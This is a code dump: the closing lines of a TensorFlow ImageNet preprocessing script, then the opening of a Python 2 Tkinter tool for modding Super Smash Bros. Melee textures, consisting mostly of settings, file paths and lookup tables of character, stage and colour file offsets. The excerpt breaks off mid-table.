  print('Saving results to %s' % FLAGS.output_directory)

  # Build a map from synset to human-readable label.
  synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
  image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)

  # Run it!
  _process_dataset('validation', FLAGS.validation_directory,
                   FLAGS.validation_shards, synset_to_human, image_to_bboxes)
  _process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
                   synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
DAT Texture Wizard.py | #!/usr/bin/python
# This file's encoding: UTF-8, so that non-ASCII characters can be used in strings.
# ------------------------------------------------------------------- #
# ~ ~ Written by DRGN of SmashBoards (Daniel R. Cappel) ~ ~ #
# - - - - [ Feb., 2015 ] - - - - #
# - - [ Python v2.7.12 and Tkinter 8.5 ] - - #
# --------------------------------------------------------------- #
programVersion = '6.1.2'
# Find the official thread here: http://smashboards.com/threads/new-tools-for-texture-hacking.373777/
# Primary logic
import os # Various file and folder operations
import io
import sys
import png # Only used for png.Reader(), for reading PNG files
import psutil # For checking running processes (checking whether temp files are in use)
import shutil # For file copying
import subprocess # Subprocess for communication with command line
import xxhash, array # Both used for generating texture file names using Dolphin's naming convention
import random, struct
import multiprocessing
import math, errno, tempfile
import hsdFiles, hsdStructures
from sets import Set
from threading import Thread
from binascii import hexlify, unhexlify # Convert from bytearrays to strings (and vice verca via unhexlify)
from string import hexdigits # For checking that a string only consists of hexadecimal characters
from datetime import datetime # For keeping track of the recently opened files.
from tplCodec import codecBase, tplDecoder, tplEncoder, missingType, noPalette
from collections import OrderedDict
# GUI dependencies
import time # Used for time.sleep() (for waits) and performance testing
import tkFont
import webbrowser # Used to open a web page.
import RenderEngine
import Tkinter as Tk
import ttk, tkMessageBox, tkFileDialog
from ctypes import c_ubyte # For image data memory management
from ScrolledText import ScrolledText
from tkColorChooser import askcolor
from PIL import Image, ImageOps, ImageTk, ImageDraw
from GuiSubComponents import (
getWindowGeometry,
basicWindow,
PopupEntryWindow,
CopyableMessageWindow,
DisguisedEntry,
VerticalScrolledFrame,
ToolTip,
HexEditEntry,
HexEditDropdown,
ImageDataLengthCalculator
)
try: from cStringIO import StringIO # Preferred for performance.
except: from StringIO import StringIO
# Extras for drag-and-drop and sound effects.
from sys import argv as programArgs # Access files given (drag-and-dropped) to the program icon.
from newTkDnD import TkDND # Access files given (drag-and-dropped) onto the running program GUI.
# Output errors to an error log, since the console likely won't be available
if programArgs[0][-4:] == '.exe': # If this code has been compiled....
    sys.stderr = open( 'Error Log.txt', 'a' )
    sys.stderr.write( '\n\n:: ' + str( datetime.today() ) + ' ::\n' ) # Timestamp each session's error output
# Load modules for hash generation
scriptHomeFolder = os.path.abspath( os.path.dirname(programArgs[0]) ) # Can't use __file__ after freeze
sys.path.append( scriptHomeFolder + '\\bin' ) # So we can use executables from there
# For performance testing
#import timeit
# User defined settings / persistent memory.
import ConfigParser
settings = ConfigParser.SafeConfigParser()
settings.optionxform = str # Tells the settings parser to preserve case sensitivity (for camelCase).
# Define some necessary file paths
# NOTE: paths are built with '\\' separators, so this program assumes a Windows host.
imagesFolder = scriptHomeFolder + '\\imgs'
texDumpsFolder = scriptHomeFolder + "\\Texture dumps"
settingsFile = scriptHomeFolder + '\\settings.ini'
pathToPngquant = scriptHomeFolder + '\\bin\\pngquant.exe' # For palette generation
# Supplemental Necessities
wimgtPath = scriptHomeFolder + '\\bin\\wimgt\\wimgt.exe' # For encoding type _14 textures only
if not os.path.exists( wimgtPath ): # If wimgt isn't found in the above directory, fall back to assuming that wimgt is installed to the system.
    wimgtPath = 'wimgt' # i.e. rely on the system PATH to resolve it
# Globals
globalDiscDetails = { #todo create a proper disc class
    'isoFilePath': '',
    'isMelee': '', # Will be '00' '01', '02', or 'pal' if the disc's DOL is a revision of Melee
    'is20XX': '', # Empty if not 20XX; populated by the check20xxVersion function
    'gameId': '',
    'rebuildRequired': False
}
# Currently loaded file objects; None until a file has been opened
globalDatFile = None
globalBannerFile = None
# Flags coordinating long-running scans with the GUI (presumably polled by worker threads -- see the Thread import)
scanningDat = False
stopAndScanNewDat = False
updatingBannerFileInfo = False
stopAndReloadBannerFileInfo = False
programClosing = False
# Pending-change tracking; non-empty lists mean there are unsaved edits
unsavedDiscChanges = []
editedDatEntries = []
editedBannerEntries = []
# Values for live updating of settings while program is running.
generalBoolSettings = {}
imageFilters = {}
# Default settings for persistent memory (saved in settings.ini file)
generalSettingsDefaults = {
    'defaultSearchDirectory': os.path.expanduser('~'),
    'hexEditorPath': '',
    'emulatorPath': '',
    'maxFilesToRemember': '6',
    'globalFontSize': '-13',
    'paddingBetweenFiles': '0x40',
    'downscalingFilter': 'lanczos', # all options: nearest, lanczos, bilinear, bicubic
    'textureExportFormat': 'png',
    'altFontColor': '#d1cede' # A shade of silver; useful for high-contrast system themes
} # Once initialized by loadSettings, these are referenced by settings.get( 'General Settings', [settingName] )
# Boolean options, stored as '0'/'1' strings (ConfigParser stores strings)
generalBoolSettingsDefaults = { # To add more options, simply add the key to here, and create an option in the main menus for it.
    'dumpPNGs': '0',
    'deleteImageDumpsOnExit': '1',
    'autoUpdateHeaders': '1',
    'backupOnRebuild': '1',
    'showCanvasGrid': '1',
    'showTextureBoundary': '0',
    'avoidRebuildingIso': '1',
    'regenInvalidPalettes': '0',
    'useDiscConvenienceFolders': '1',
    'autoGenerateCSPTrimColors': '0',
    'cascadeMipmapChanges': '1',
    'useDolphinNaming': '0',
    'useAltFontColor': '0'
} # Once initialized by loadSettings, these are referenced by generalBoolSettings[setting].get()
# Texture-list filter defaults; '=|' appears to encode an operator and an empty value -- verify against the filter parser
imageFiltersDefaults = {
    'widthFilter': '=|',
    'heightFilter': '=|',
    'aspectRatioFilter': '=|',
    'imageTypeFilter': '=|',
    'offsetFilter': '=|'
}
# Lookup tables:
# GX/TPL texture format IDs mapped to their common names
imageFormats = { 0:'I4', 1:'I8', 2:'IA4', 3:'IA8', 4:'RGB565', 5:'RGB5A3', 6:'RGBA8', 8:'CI4', 9:'CI8', 10:'CI14x2', 14:'CMPR' }
# Same formats, as user-facing display strings (ID + name)
userFriendlyFormatList = [ '_0 (I4)', '_1 (I8)', '_2 (IA4)', '_3 (IA8)', '_4 (RGB565)', '_5 (RGB5A3)', '_6 (RGBA8)', '_8 (CI4)', '_9 (CI8)', '_10 (CI14x2)', '_14 (CMPR)' ]
# SSBM Disc tree filename lookup.
audioNameLookup = { # .sem, .hps, and .ssm files
    'opening': "The game's Opening Movie audio",
    'smash2': 'Audio Scripts And Sound Effect Info',
    'swm_15min': "'Special Movie 2' audio"
}
movieNameLookup = { # Video files only (.mth); no audio with these.
    'MvHowto': 'The "How to Play" video',
    'MvOmake15': 'The 15-Minute "Special Movie"',
    'MvOpen': "The game's Opening Movie"
}
# Two-letter codes found in character file names, mapped to character/usage descriptions
charNameLookup = {
    'Bo': '[Boy] Male Wireframe',
    'Ca': 'Captain Falcon',
    'Ch': 'Crazy Hand',
    'Cl': 'Young Link',
    'Co': 'Common to the cast',
    'Dk': 'Donkey Kong',
    'Dr': 'Dr. Mario',
    'Fc': 'Falco',
    'Fe': 'Roy [Fire Emblem]',
    'Fx': 'Fox',
    'Gk': '[GigaKoopa] GigaBowser',
    'Gl': '[Girl] Female Wireframe',
    'Gn': 'Ganondorf',
    'Gw': "Game 'n Watch",
    'Ic': 'Ice Climbers',
    'Kb': 'Kirby',
    'Kp': 'Bowser [Koopa]',
    'Lg': 'Luigi',
    'Lk': 'Link',
    'Mh': 'Master Hand',
    'Mn': 'Menus Data',
    'Mr': 'Mario',
    'Ms': 'Marth [Mars]',
    'Mt': 'Mewtwo',
    'Nn': 'Ice Climbers [Nana]',
    'Ns': 'Ness',
    'Pc': 'Pichu',
    'Pe': 'Peach',
    'Pk': 'Pikachu',
    'Pn': 'Ice Climbers [Popo/Nana] ',
    'Pp': 'Ice Climbers [Popo]',
    'Pr': 'Jigglypuff [Purin]',
    'Sb': 'SandBag',
    'Sk': 'Sheik',
    'Ss': 'Samus',
    'Wf': 'Wolf',
    'Ys': 'Yoshi',
    'Zd': 'Zelda'
}
# Two-letter costume-color codes in character file names, mapped to color names
charColorLookup = {
    'Aq': 'aqua',
    'Bk': 'black',
    'Bu': 'blue',
    'Gr': 'green',
    'Gy': 'gray',
    'La': 'lavender',
    'Nr': 'neutral',
    'Or': 'orange',
    'Pi': 'pink',
    'Rd': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation
    'Re': 'red',
    'Rl': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation (red 'L')
    'Rr': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation (red 'R')
    'Wh': 'white',
    'Ye': 'yellow'
}
# Stage file-name codes mapped to stage names
stageNameLookup = { # Keys should be 3 characters long.
    'Bb.': 'Big Blue',
    'Cn.': 'Corneria',
    'Cs.': "Princess Peach's Castle",
    'EF1': 'Goomba Trophy Stage',
    'EF2': 'Entei Trophy Stage',
    'EF3': 'Majora Trophy Stage',
    'Fs.': 'Fourside',
    'Fz.': 'Flat Zone',
    'Gb.': 'Great Bay',
    'Gd.': 'Kongo Jungle [Garden]',
    'Gr.': 'Green Greens',
    'He.': 'All-Star Rest Area [Heal]',
    'Hr.': 'Homerun Contest',
    'I1.': 'Mushroom Kingdom',
    'I2.': 'Mushroom Kingdom II (Subcon)',
    'TIc': 'Icetop (unused stage)',
    'Im.': 'Icicle Mountain',
    'Iz.': 'Fountain of Dreams [Izumi]',
    'Kg.': 'Kongo Jungle',
    'Kr.': 'Brinstar Depths [Kraid]',
    'Mc.': 'Mute City',
    'NBa': 'Battlefield',
    'NBr': 'F-Zero Grand Prix',
    'NFg': 'Trophy Collector [Figure Get]',
    'NKr': 'Mushroom Kingdom Adventure',
    'NLa': 'Final Destination',
    'NPo': 'Pushon?',
    'NSr': 'Hyrule Maze',
    'NZr': 'Brinstar Escape Shaft [Zebes]',
    'Ok.': 'Kongo Jungle (N64)',
    'Op.': 'Dream Land (N64)',
    'Ot.': 'Onett',
    'Oy.': "Yoshi's Island (N64)",
    'Ps.': 'Pokemon Stadium',
    'Ps1': 'Pokemon Stadium - Fire Form',
    'Ps2': 'Pokemon Stadium - Grass Form',
    'Ps3': 'Pokemon Stadium - Water Form',
    'Ps4': 'Pokemon Stadium - Rock Form',
    'Pu.': 'Poke Floats [Pura]',
    'Rc.': 'Rainbow Cruise',
    'Sh.': 'Hyrule Temple [Shrine]',
    'St.': "Yoshi's Story",
    'Te.': '"TEST" (a.k.a. The Coffee Shop)',
    'Ve.': 'Venom',
    'Yt.': "Yoshi's Island",
    'Ze.': 'Brinstar [Zebes]'
}
# Stage codes (from the table above) that only appear in single-player modes
onePlayerStages = ( 'EF1', 'EF2', 'EF3', 'He.', 'Hr.', 'NBr', 'NFg', 'NKr', 'NSr', 'NZr', 'Te.' )
# Alternate/custom stage files added by the 20XX Hack Pack; not present in a vanilla disc
specialStagesIn20XX = { # Key = file name string beginning after 'Gr'
    'C0.usd': 'Sector Z', # 20XXHP 5.0+
    'Cs.0at': "Omega Peach's Castle", # 20XXHP 5.0+
    'Fs.1at': 'Smashville Fourside',
    'Fs.2at': 'Moonside', # 20XXHP 5.0+
    'Gb.0at': 'Turtle Stage', # 20XXHP 5.0+
    'Gb.1at': 'Great Bay, Beach', # 20XXHP 5.0+
    'Gb.hat': 'Great Bay, Hacked',
    'Gd.1at': 'Jungle Japes, Hacked (w/platform)',
    'Gd.2at': 'Jungle Japes, Omega',
    'Gr.1at': 'Green Greens, Hacked',
    'He.0at': 'Walk-Off Heal', # 20XXHP 5.0+
    'I1.0at': "Milun's Mushroom Kingdom", # 20XXHP 5.0+
    'I1.1at': "Porygon", # 20XXHP 5.0+
    'I1.2at': "Shiny Porygon", # 20XXHP 5.0+
    'Iz.gat': 'Cave of Dreams', # 20XXHP 5.0+
    'Kg.hat': 'Kongo Jungle, Hacked',
    'NBa.2at': 'Ancient Battlefield',
    'NBa.3at': 'Battlefield Plaza',
    'NBa.4at': 'Matrix Battlefield', # Old 20XX
    'NBa.bat': 'Battlefield Plaza',
    'NBa.gat': 'Brawl Battlefield - Day', # 20XXHP 5.0+
    'NBa.hat': 'Brawl Battlefield - Day (w/Castle)', # 20XXHP 5.0+
    'NBa.iat': 'Brawl Battlefield - Void', # 20XXHP 5.0+
    'NBa.lat': 'Brawl Battlefield',
    'NFg.0at': 'Trophy Collector (Two platforms)',
    'NFg.1at': 'Trophy Collector (Three platforms)',
    'NFg.2at': 'Trophy Collector, Omega',
    'NKr.1at': 'Mushroom Kingdom Adventure, Hacked',
    'NKr.2at': 'Mushroom Kingdom Adventure, Omega',
    'NLa.0at': 'Final Destination',
    'NLa.2at': 'Wii-U Final Destination', # Old 20XX
    'NLa.gat': 'Wii-U Final Destination', # 20XXHP 5.0+
    'NLa.hat': 'zankyou FD', # 20XXHP 5.0+
    'NSr.1at': 'Hyrule Maze, Hacked',
    'Ok.0at': 'Monster Island', # 20XXHP 5.0+
    'Op.gat': 'Halberd Land', # 20XXHP 5.0+
    'Op.kat': 'KirbyWare, Inc.',
    'Op.rat': 'Return to Dream Land',
    'Oy.hat': "Yoshi's Island (N64), Milun Hack",
    'Oy.wat': 'WarioWare, Inc.',
    'Pb.usd': 'Pokemon Stadium (Blue, No transforms)', # Old 20XX
    'Pg.usd': 'Indigo Stadium', # 20XXHP 5.0+
    'Pn.usd': 'Pokemon Stadium (Blue, No transforms)', # 20XXHP 5.0+
    'Sh.sat': 'Skyrule (Redux)',
    'Sh.0at': "Dark Temple", # 20XXHP 5.0+
    'St.gat': "Peach's Story", # 20XXHP 5.0+
    'TCa.gat': 'Silph Co. (Saffron City)', # 20XXHP 5.0+
    'TCl.bat': 'Smash 4 Battlefield',
    'TCl.gat': 'Brawl Battlefield - Dusk', # 20XXHP 5.0+
    'TCl.sat': 'Suzaku Castle',
    'TDk.0at': 'Meta Mine', # 20XXHP 5.0+
    'TDr.0at': 'Training Room', # 20XXHP 5.0+
    'TFe.kat': 'Kalos Pokémon League',
    'TFx.0at': 'The Plain', # 20XXHP 5.0+
    'TGn.0at': '75m', # 20XXHP 5.0+
    'TKb.gat': 'Miiverse (variation 1)',
    'TKb.hat': 'Miiverse (variation 2)',
    'TKb.iat': 'Miiverse (variation 3)',
    'TKb.jat': 'Miiverse (variation 4)',
    'TKp.mat': 'Metroid Lab',
    'TLg.1at': 'Giant GameCube',
    'TLg.mat': 'Metal Cavern M',
    'TLk.0at': 'Lylat Cruise', # 20XXHP 5.0+
    'TMs.0at': 'Toy Time', # 20XXHP 5.0+
    'TNs.0at': 'Throne Room (Wario Land)', # 20XXHP 5.0+
    'TPe.hat': 'Hyrule Castle (N64)',
    'TSk.0at': 'Meta Crystal', # 20XXHP 5.0+
    #'TSk.1at': 'The North Palace', # 20XXHP 5.0+
    'Yt.1at': "Yoshi's Island, Hacked",
    'Yt.2at': "Milun's Island - Form A", # 20XXHP 5.0+
    'Yt.3at': "Milun's Island - Form B", # 20XXHP 5.0+
    'Yt.4at': "Milun's Island - Form C" # 20XXHP 5.0+
}
# Miscellaneous system/menu file-name stems, mapped to user-facing descriptions
miscNameLookup = {
    'GmGover': '1P Mode: Game Over Screen',
    'GmPause': 'Pause Screen',
    'GmRst': 'Results Screen',
    'GmStRoll': 'Credits Screen/Minigame',
    'GmTitle': 'Title Screen',
    'GmTou1p': 'Tournament Mode, File 1',
    'GmTou2p': 'Tournament Mode, File 2',
    'GmTou3p': 'Tournament Mode, File 3',
    'GmTou4p': 'Tournament Mode, File 4',
    'GmTrain': 'Training Mode',
    'GmTtAll': 'Title Screen',
    'IfComS0': 'Dual 1v1 Infographic',
    'IfComS1': 'Chess Melee Infographic',
    'IfComS2': 'Dodgeball Infographic',
    'IfComS3': 'NBA Jam Infographic',
    'IfComS4': 'SD Remix Infographic',
    'IfComS5': 'SSBM Tier List', # Fixed typo in displayed text (was 'Teir')
    'IfHrNoCn': 'Home Run Contest, File 1',
    'IfHrReco': 'Home Run Contest, File 2',
    'IfPrize': 'Special Achievement Messages',
    'IfVsCam': 'Special Melee: Camera Mode',
    'IrAls': '1P Mode: "VS." Intro Screens',
    'ItCo': 'Items',
    'LbMcGame': 'Memory card banners and icon',
    'LbMcSnap': 'Memory card snapshot banner/icon',
    'MnExtAll': 'Extra menu graphics for the CSS',
    'MnMaAll': 'Main menu graphics file',
    'MnSlChr': 'Character Select Screen',
    'MnSlMap': 'Stage Select Screen',
    'NtAppro': "'New Challenger' Screens",
    'opening': 'Game banner, title, and description texts',
    'PlCo': 'Textures common to the cast',
    'SdMenu': 'Special menu characters'
}
# The following offsets are for the Character Color Converter. They are file offsets (meaning they include the 0x20 file header size).
# These represent comparable blocks of data. Blocks that should represent the same textures across differing character files.
# The ranges exclude the palette data pointers, but not the rest of the palette headers.
# Structure: CCC[charKey] is a dict with 'fullName'/'universe' strings plus one entry per
# costume-color code; each color maps to a tuple of (start, end) file-offset ranges.
CCC = {
    'dataStorage': {'sourceFile': '', 'destFile': ''}, # Will also be filled with other data by prepareColorConversion().
    'Captain': { 'fullName': 'Captain Falcon', 'universe': 'F-Zero',
        'Bu': ( (0x21040, 0x7ec40), ), # All type _14
        'Gr': ( (0x21020, 0x7ec20), ),
        'Gy': ( (0x21000, 0x7ec00), ),
        'Nr': ( (0x21060, 0x7ec60), ),
        'Re': ( (0x21040, 0x7ec40), ),
        #'Re': ( (0x21040, 0x7ec40), ), # Hell Hawk texture at (0x7ec40, 0x86c40); no equivalent in other files.
        'Wh': ( (0x21120, 0x7ed20), )
    },
    'Clink': { 'fullName': 'Young Link', 'universe': 'The Legend of Zelda',
        'Bk': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00), # Body / equipment
            (0x43760, 0x57760), (0x58200, 0x6c200), # Eyes - image data
            (0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200), # Eyes - palettes & palette headers
            (0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ), # Eyes - palettes & palette headers
        'Bu': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
            (0x43760, 0x57760), (0x58200, 0x6c200),
            (0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
            (0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
        'Nr': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
            (0x43760, 0x57760), (0x58200, 0x6c200),
            (0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
            (0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
        'Re': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
            (0x43760, 0x57760), (0x58200, 0x6c200),
            (0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
            (0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
        'Wh': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
            (0x43760, 0x57760), (0x58200, 0x6c200),
            (0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
            (0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) )
    },
    'Donkey': { 'fullName': 'Donkey Kong', 'universe': 'Donkey Kong',
        'Bk': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
            (0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
        'Bu': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
            (0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
        'Gr': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
            (0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
        'Nr': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
            (0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
        'Re': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
            (0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) )
    },
    'Drmario': { 'fullName': 'Dr. Mario', 'universe': 'Mario',
        'Bk': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
            (0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
        'Bu': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
            (0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
        'Gr': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
            (0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
        'Nr': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
            (0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
        'Re': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
            (0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) )
    },
    'Falco': { 'fullName': 'Falco', 'universe': 'Star Fox',
        'Bu': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
        'Gr': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
        'Nr': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
        'Re': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) )
    },
    'Emblem': { 'fullName': 'Roy', 'universe': 'Fire Emblem',
        'Bu': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
        'Gr': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
        'Nr': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
        'Re': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
        'Ye': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) )
    },
    'Fox': { 'fullName': 'Fox', 'universe': 'Star Fox',
        'Gr': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
        'La': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
        'Nr': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
        'Or': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) )
    },
    'Ganon': { 'fullName': 'Ganondorf', 'universe': 'The Legend of Zelda',
        'Bu': ( (0x1fbc0, 0x5d1c0), ),
        'Gr': ( (0x1fbc0, 0x5d1c0), ),
        'La': ( (0x1fbc0, 0x5d1c0), ),
        'Nr': ( (0x1fbc0, 0x5d1c0), ),
        'Re': ( (0x1fbc0, 0x5d1c0), )
    },
    'Kirby': { 'fullName': 'Kirby', 'universe': 'Kirby', # Ignores eye textures
        'Bu': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
        'Gr': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
        'Nr': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
        'Re': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
        'Wh': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
        'Ye': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) )
    },
    'Koopa': { 'fullName': 'Bowser', 'universe': 'Mario',
        'Bk': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x6fe00), (0x70b20, 0x75d20),
            (0x75d24, 0x75f00), (0x75f04, 0x76120), (0x76124, 0x76340), (0x76344, 0x76560), (0x76564, 0x76580) ),
        'Bu': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x6fe00), (0x70b20, 0x75d20),
            (0x75d24, 0x75f40), (0x75f44, 0x76160), (0x76164, 0x76380), (0x76384, 0x765a0), (0x765a4, 0x765a0) ), # NOTE(review): last range (0x765a4, 0x765a0) ends before it starts -- possibly a typo for 0x765c0 (compare 'Nr'); verify
        'Nr': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x75e00), (0x76b20, 0x7bd20),
            (0x7bd24, 0x7bf40), (0x7bf44, 0x7c160), (0x7c164, 0x7c380), (0x7c384, 0x7c5a0), (0x7c5a4, 0x7c5c0) ),
        'Re': ( (0x2a720, 0x61520), (0x61520, 0x62720), (0x62724, 0x6de60), (0x6de60, 0x6fe60), (0x70b80, 0x75d80),
            (0x75d84, 0x75ee0), (0x75ee4, 0x760e0), (0x760e4, 0x76300), (0x76304, 0x76520), (0x76524, 0x76540) )
    },
    'Luigi': { 'fullName': 'Luigi', 'universe': 'Mario',
        'Aq': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
        'Nr': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
        'Pi': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
        'Wh': ( (0x1b2c0, 0x2c740), (0x2c740, 0x35960), (0x35960, 0x47600), (0x47ea0, 0x75940) )
    },
    'Link': { 'fullName': 'Link', 'universe': 'The Legend of Zelda',
        'Bk': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
            (0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
            (0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
            (0x76104, 0x76320), (0x76324, 0x76340) ),
        'Bu': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
            (0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
            (0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
            (0x76104, 0x76320), (0x76324, 0x76340) ),
        'Nr': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
            (0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
            (0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
            (0x76104, 0x76320), (0x76324, 0x76340) ),
        'Re': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
            (0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
